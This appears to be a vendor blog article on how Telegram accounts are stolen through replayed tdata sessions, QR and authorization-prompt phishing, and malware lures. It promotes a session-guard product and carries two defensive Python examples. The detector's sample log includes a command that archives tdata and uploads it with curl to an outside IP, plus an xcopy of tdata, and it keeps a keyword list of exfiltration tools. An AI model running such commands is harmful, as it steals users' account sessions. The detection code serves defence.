Account takeover
How Telegram accounts actually get stolen (even with 2FA)
Most stolen Telegram accounts are not "hacked" in the way people imagine. Attackers do not guess your password or trick you into reading a code aloud. They steal the already-authorized session itself, usually the tdata folder on your computer, and replay it. No password, no login code, and no 2FA prompt is involved, which is exactly why two-factor authentication does not stop it and why Telegram sends you no alert.
The thing nobody tells you: you were not phished for a password
When people hear "my Telegram got hacked," they picture someone guessing a password or tricking them into reading an SMS code out loud. That happens, but it is not the common case anymore. The common case is quieter and harder to spot: an attacker steals the part of Telegram that keeps you logged in, copies it, and walks straight into your account from their own machine.
That stolen piece is your session. On Telegram Desktop it lives in a folder called tdata. Once someone has it, they do not need your password, your phone, your SMS code, or your 2FA. The login already happened, on your device, with your blessing. They are just replaying it.
This is why so many victims say the same confused thing: "I never shared a code. I never clicked anything obvious. How did this happen?" Here is the honest, plain-language version.
Session theft (the tdata folder): the number one vector
When you log into Telegram Desktop, the app stores a long-lived authorization key on disk so you do not have to re-enter a code every time you open it. That is the tdata folder. By default it is protected by nothing more than your operating-system login: Telegram Desktop does offer a local passcode that encrypts tdata at rest, but most people never set one, and without it the folder is the digital equivalent of a house key that never expires.
Infostealer malware, the kind that rides in on a cracked app, a malicious browser extension, a poisoned npm or PyPI package, or a "run this to fix your error" command, scans your machine for exactly this folder and exfiltrates it. Security firm Imperva traced a malicious PyPI package whose entire job was to steal the Telegram Desktop tdata folder, noting that with that folder an attacker "doesn't need to bypass passwords or two-factor authentication, they simply steal the session and gain unlimited access" (Imperva, 2025).
This is not theoretical or rare. In April 2026, SANS Internet Storm Center published a honeypot incident where an attacker broke in over SSH and, within seconds, ran a command hunting for ~/.local/share/TelegramDesktop/tdata alongside SMS and modem device paths. The analyst's note is chilling in its clarity: stealing CPU cycles is a short-term gain, but "stealing the Telegram session is a long-term asset," and the attacker was also hunting SMS logs specifically to circumvent the victim's two-factor authentication (SANS ISC, Apr 2026).
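What that honeypot command looks like from the defender's side, as an added example that is not part of the original article or of the SANS write-up: a small detector that scans shell-audit log lines for the tdata locations Telegram Desktop uses on Linux, macOS and Windows, and raises the severity when the path appears in the same command as an archive, copy or network tool, or next to the modem and SMS paths the attacker was also hunting. The log lines, hostnames and IP addresses are constructed for the example; the macOS path is the standard (non-App-Store) Telegram Desktop location.

```python
"""Added example: flag log lines that touch Telegram Desktop's tdata folder.

Not from the original article or the SANS write-up. SAMPLE_LOG below is
constructed; IPs are from documentation ranges.
"""
import re
from typing import List, NamedTuple, Tuple

# Where Telegram Desktop keeps tdata: Linux (~/.local/share/TelegramDesktop),
# macOS non-App-Store build (~/Library/Application Support/Telegram Desktop),
# Windows (%APPDATA%\Telegram Desktop). Logs may carry "~", "$HOME" or the
# expanded home directory; Windows may appear as %APPDATA% or the expanded path.
TDATA_PATTERNS = [
    re.compile(r"(?:~|\$HOME|/home/[^/\s]+|/root)/\.local/share/TelegramDesktop/tdata"),
    re.compile(r"/Library/Application Support/Telegram Desktop/tdata"),
    re.compile(r"(?:%APPDATA%|AppData\\Roaming)\\Telegram Desktop\\tdata", re.I),
]

# Tools that copy, archive, encode or ship a directory off the box. Touching tdata
# alone is low signal (backups, the app itself); tdata plus one of these in the
# same command is the infostealer shape.
EXFIL_TOOLS = re.compile(
    r"\b(tar|zip|7z|rar|cp|xcopy|robocopy|scp|rsync|curl|wget|nc|ncat|base64|"
    r"Compress-Archive|Invoke-WebRequest)\b",
    re.I,
)

# Modem devices and SMS spools: the 2FA-code harvesting side of the same hunt.
SMS_MODEM = re.compile(r"/dev/tty(?:USB|ACM)|/var/spool/sms|\bgammu\b|\bsmsd\b")


class Finding(NamedTuple):
    line_no: int
    severity: str            # "high" | "medium"
    tags: Tuple[str, ...]    # what raised the severity
    line: str


def scan(lines: List[str]) -> List[Finding]:
    """Return a Finding for every line that references a tdata path."""
    findings = []
    for n, line in enumerate(lines, 1):
        if not any(p.search(line) for p in TDATA_PATTERNS):
            continue
        tags = []
        if EXFIL_TOOLS.search(line):
            tags.append("exfil-tool")
        if SMS_MODEM.search(line):
            tags.append("sms-modem-path")
        severity = "high" if tags else "medium"
        findings.append(Finding(n, severity, tuple(tags), line))
    return findings


# Constructed log excerpt: an SSH login, a harmless disk-usage check, the kind of
# hunt the honeypot saw (tdata next to modem and SMS paths), exfiltration, a miner,
# and a Windows endpoint line for contrast.
SAMPLE_LOG = """\
2026-04-03T11:02:14Z sshd[2211]: Accepted password for ubuntu from 203.0.113.9 port 51420 ssh2
2026-04-03T11:02:15Z bash[2230]: du -sh ~/.local/share/TelegramDesktop/tdata
2026-04-03T11:02:15Z bash[2230]: ls -la ~/.local/share/TelegramDesktop/tdata /dev/ttyUSB* /var/spool/sms
2026-04-03T11:02:16Z bash[2230]: tar czf /tmp/.x.tgz ~/.local/share/TelegramDesktop/tdata && curl -T /tmp/.x.tgz http://203.0.113.77/up
2026-04-03T11:03:01Z bash[2230]: ./xmrig -o pool.example:3333
2026-04-03T11:05:22Z cmd[4411]: xcopy "%APPDATA%\\Telegram Desktop\\tdata" C:\\Users\\Public\\t\\ /E /H
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"line {f.line_no} [{f.severity}] {','.join(f.tags) or '-'}: {f.line}")
```

On the sample, the disk-usage line is reported at medium severity and the three attacker lines at high; the pattern list is the part to extend (snap and flatpak installs of Telegram Desktop put tdata elsewhere), and in a real pipeline the lines would come from auditd EXECVE records or EDR process telemetry rather than a string constant.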
And stolen sessions are a commodity. Imperva found forum listings selling ready-to-use Telegram identities, complete with contact lists and live sessions, at prices from roughly $5 for ten accounts up to $400 for a thousand. You can even pick the country.
We took this apart in a lab and measured how fast a guard ends a replayed session: about 140 milliseconds from the moment a poll catches the attacker's second live session. If you want the deep technical version, read our write-up "We watched an attacker replay a stolen Telegram session".
Why 2FA does not save you here
This is the misconception that costs people their accounts, so it is worth being blunt.
Telegram's two-factor password (the cloud password) protects one specific event: a brand-new login. When someone tries to add a new device with your phone number and SMS code, Telegram demands the 2FA password too. Good. That is real protection against a fresh login.
A stolen session is not a new login. The login already succeeded, on your machine, days or weeks ago. The attacker is reusing that finished login. There is no new-device challenge to pass, so there is nothing for your 2FA password to gate. The same logic applies to the 16-billion-record credential compilation reported in 2025: a lot of those records ship with active session tokens and cookies, and the researchers noted attackers can "bypass MFA by hijacking active sessions" rather than defeating it (Cybernews, 2025).
Turn 2FA on. It genuinely helps against other attacks. Just do not believe it stands between you and a stolen session, because it does not.
And Telegram does not even alert you
Here is the part that makes session theft so cruel. When the attacker replays your stolen session, Telegram does not see an intruder. It sees you, opening your account from a device that is already authorized. So it sends no "new login" warning, no email, no push. The first sign most victims get is their own contacts asking why they are begging for crypto, or a lockout after the attacker quietly changes the number and email.
You will not get a heads-up. By design, there is nothing to warn you about. The only place the extra device shows up is the Devices (active sessions) list in Telegram's settings, and almost nobody checks that every day.
The other live vectors worth knowing
QR-login abuse. Telegram lets you log in by scanning a QR code with your phone. Attackers generate a login QR for their own session, dress it up inside a fake "verify your account" or "claim your airdrop" page, and get you to scan it. You think you are confirming something. You are actually authorizing their device.
Authorization-prompt phishing (Feb 2026). Security firm CYFIRMA documented an evolving campaign that abuses Telegram's own authentication workflow. The attacker uses their own Telegram API credentials so that a real, legitimate authorization prompt pops up inside your trusted Telegram app, framed as a routine "security check." You tap Approve, and the attacker gets a fully authorized session without you ever scanning a QR or typing a password (CYFIRMA, Feb 2026). The genius and the evil of it is that the final click happens in the genuine Telegram UI, so every instinct tells you it is safe.
The fake-job and fake-meeting malware lure. If you work in crypto, this one is aimed at you. North Korea-linked groups run elaborate fake recruiting operations: a polished company, a Calendly link, a Telegram contact who walks you to a "video meeting app" or a coding test you need to run locally. Running it installs malware that scrapes wallet extensions like MetaMask and Phantom and, yes, lifts your Telegram session (The Hacker News, 2025). The job interview has quietly become a front line for crypto theft.
The common thread across all four: at no point do you hand over a password. You hand over a live, authorized session.
Why we built Sessions
We are crypto and fintech people, and we spent years watching friends lose Telegram accounts to exactly these attacks, then get hit by a second scam from "recovery experts" in their DMs. The frustrating part is that the takeover is detectable. A replayed session shows up as a second live session that behaves in ways your real one never would.
So we built Sessions, a non-custodial guard that watches your Telegram for hijacked or replayed sessions and unrecognized logins and ends the attacker's session the moment it sees it. It runs inside an attested AWS Nitro enclave and its code is open source, so the claim that it never reads your messages or touches your funds is something you can verify against the attestation rather than take on trust, and you can revoke its access at any time. We are not a recovery service and we will never claim to be one.
That last point matters: only Telegram itself can recover a hacked account. Anyone who slides into your DMs promising to get it back for a fee is running the second scam. Do not pay them. The honest move is to prevent the takeover from sticking, not to chase a recovery that only Telegram can perform.
If you want to understand why the obvious fix, terminating the attacker's session yourself, usually fails, read "Why terminating your Telegram sessions does not log the hacker out".
Frequently asked questions
- I have 2FA turned on. How did someone still get into my Telegram?
- Because 2FA only protects a brand-new login. The attacker almost certainly stole your existing, already-authorized session (usually the tdata folder on your computer) and replayed it. The login had already happened on your device, so there was no new-device challenge for your 2FA password to block. Keep 2FA on, but know it does not cover session theft.
- I never shared a code or clicked a phishing link. How is this possible?
- Most takeovers do not need a code or a password. Infostealer malware copies the file that keeps you logged in (tdata) and the attacker reuses it from their own machine. You can be compromised by a cracked app, a malicious browser extension, a poisoned software package, or a fake job or meeting app you were asked to run, without ever typing a credential into a fake page.
- Why did Telegram not warn me that someone logged in?
- Because to Telegram it did not look like a new login. A replayed stolen session looks like you opening your own already-authorized account from another device, so no new-login alert, email, or push is generated. That silence is by design, and it is why session theft is so hard to catch in the moment.
- What is the tdata folder and why do attackers want it?
- tdata is the folder Telegram Desktop uses to keep you logged in without re-entering a code each time. It contains a long-lived authorization key, effectively a house key that never expires. If malware copies that folder, the attacker has full access to your account without your password, your phone, or your 2FA. The one thing that slows them down is a Telegram Desktop local passcode, which encrypts tdata at rest and leaves the attacker a passcode to crack before the key is usable. Stolen tdata is openly bought and sold on forums for a few dollars per account.
- Someone in my DMs says they can recover my hacked Telegram account. Should I pay them?
- No. Only Telegram can recover a hacked account. Anyone promising to recover it for a fee is running the second scam that targets people right after a takeover. Do not pay them and do not share any codes with them. Use Telegram's official recovery flow instead.
- If I cannot rely on 2FA, what actually reduces the risk of session theft?
- Keep your devices clean (no cracked software, no random packages or apps run on request). Set a local passcode in Telegram Desktop so tdata is encrypted at rest instead of lying there readable to any process running as you. Be suspicious of any QR you are asked to scan or any authorization prompt framed as a routine security check. Periodically open the Devices (active sessions) list in Telegram's settings, end anything you do not recognize, and set old sessions to terminate automatically after a period of inactivity. For continuous protection, a guard that watches for a replayed or unrecognized session and ends it fast addresses the gap that 2FA structurally cannot cover.
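To make "review your active sessions and end the ones that are not you" concrete, here is an added example (our illustration, not the Sessions product's code and not Telegram's): the decision logic run over a snapshot shaped like what Telegram's account.getAuthorizations returns, producing the list of hashes you would hand to account.resetAuthorization. The snapshot, allowlist, hashes and IP addresses are constructed. The drift heuristic (an allowlisted session suddenly reporting a different platform, device and country) is an assumption about how a hijacked key tends to present, not a guarantee. Fetching the list and issuing the reset calls is left to a client library such as Telethon and is not shown.

```python
"""Added example: session-review policy for a Telegram account.

Not the article's or the Sessions product's code. Works on a constructed
snapshot shaped like Telegram's account.getAuthorizations result; the network
calls (fetching the list, account.resetAuthorization(hash) per flagged entry)
belong to a client library and are not shown.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Telegram rejects resetAuthorization (FRESH_RESET_AUTHORISATION_FORBIDDEN) when the
# session issuing it is less than 24 hours old, so a freshly logged-in guard, or a
# victim who just logged back in, cannot kick anyone out yet.
FRESH_SESSION_LOCK = timedelta(hours=24)


@dataclass(frozen=True)
class Authorization:
    """One entry of the active-session list (a subset of Telegram's fields)."""
    hash: int            # opaque id; this is what account.resetAuthorization takes
    device_model: str
    platform: str
    ip: str
    country: str
    date_created: datetime
    current: bool        # True for the session that fetched the list


@dataclass(frozen=True)
class Enrolled:
    """Fingerprint the owner confirmed when allowlisting a session."""
    device_model: str
    platform: str
    country: str


@dataclass(frozen=True)
class Verdict:
    hash: int
    action: str          # "keep" | "terminate" | "blocked"
    reason: str


def review(auths, allowlist, now):
    """One Verdict per session.

    Never end the current session (self-lockout); keep sessions that are
    allowlisted and still match their enrolled fingerprint; end everything else.
    Age is deliberately not a signal: a replayed stolen key is exactly as old as
    the legitimate login it was copied from.
    """
    me = next(a for a in auths if a.current)
    can_terminate = now - me.date_created >= FRESH_SESSION_LOCK
    verdicts = []
    for a in auths:
        if a.current:
            verdicts.append(Verdict(a.hash, "keep", "current session; never self-terminate"))
            continue
        known = allowlist.get(a.hash)
        if known is None:
            reason = "not in allowlist"
        elif (a.device_model, a.platform, a.country) != (known.device_model, known.platform, known.country):
            # Heuristic (assumption, not a guarantee): an allowlisted authorization
            # whose reported device/platform/country drifts may be the same key
            # driven from another machine. Ending it also logs out the legitimate
            # device it was copied from; that device must log in again, through 2FA.
            reason = (f"allowlisted as {known.platform}/{known.device_model} in {known.country}, "
                      f"now {a.platform}/{a.device_model} from {a.country}")
        else:
            verdicts.append(Verdict(a.hash, "keep", "matches enrolled fingerprint"))
            continue
        if can_terminate:
            verdicts.append(Verdict(a.hash, "terminate", reason))
        else:
            verdicts.append(Verdict(a.hash, "blocked",
                                    reason + "; reviewing session is under 24h old, Telegram would refuse"))
    return verdicts


def hashes_to_reset(verdicts):
    """The hashes you would pass, one by one, to account.resetAuthorization."""
    return [v.hash for v in verdicts if v.action == "terminate"]


# Constructed snapshot (fake hashes, documentation-range IPs).
NOW = datetime(2026, 4, 3, 12, 0, tzinfo=timezone.utc)
SNAPSHOT = [
    Authorization(0x1111, "Pixel 8", "Android", "198.51.100.4", "DE", NOW - timedelta(days=400), True),
    Authorization(0x2222, "ThinkPad X1", "Linux", "198.51.100.5", "DE", NOW - timedelta(days=90), False),
    Authorization(0x3333, "DESKTOP-7F2K", "Windows", "203.0.113.9", "NG", NOW - timedelta(days=95), False),
    Authorization(0x4444, "Telegram Web", "Browser", "192.0.2.17", "US", NOW - timedelta(minutes=3), False),
]
# Same snapshot, but the reviewing session itself logged in two hours ago.
YOUNG_SNAPSHOT = [Authorization(0x1111, "Pixel 8", "Android", "198.51.100.4", "DE",
                                NOW - timedelta(hours=2), True)] + SNAPSHOT[1:]
ALLOWLIST = {
    0x1111: Enrolled("Pixel 8", "Android", "DE"),
    0x2222: Enrolled("ThinkPad X1", "Linux", "DE"),
    0x3333: Enrolled("MacBook Pro", "macOS", "DE"),   # enrolled a Mac; snapshot shows it elsewhere
}

if __name__ == "__main__":
    verdicts = review(SNAPSHOT, ALLOWLIST, NOW)
    for v in verdicts:
        print(f"{v.hash:#06x} {v.action:9} {v.reason}")
    print("reset:", [hex(h) for h in hashes_to_reset(verdicts)])
```

Two things the example makes visible that the settings screen does not: the 24-hour lock means a victim who reinstalls and logs back in cannot immediately evict anyone, which is one reason the "just terminate it yourself" fix disappoints; and terminating a drifted allowlisted session costs you that device's login too, which is the right trade when its key may already be in someone else's hands.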
Stop a takeover before it starts.
Sessions watches your Telegram around the clock and removes any session that isn’t you, automatically. Open, hardware-attested, and yours to revoke.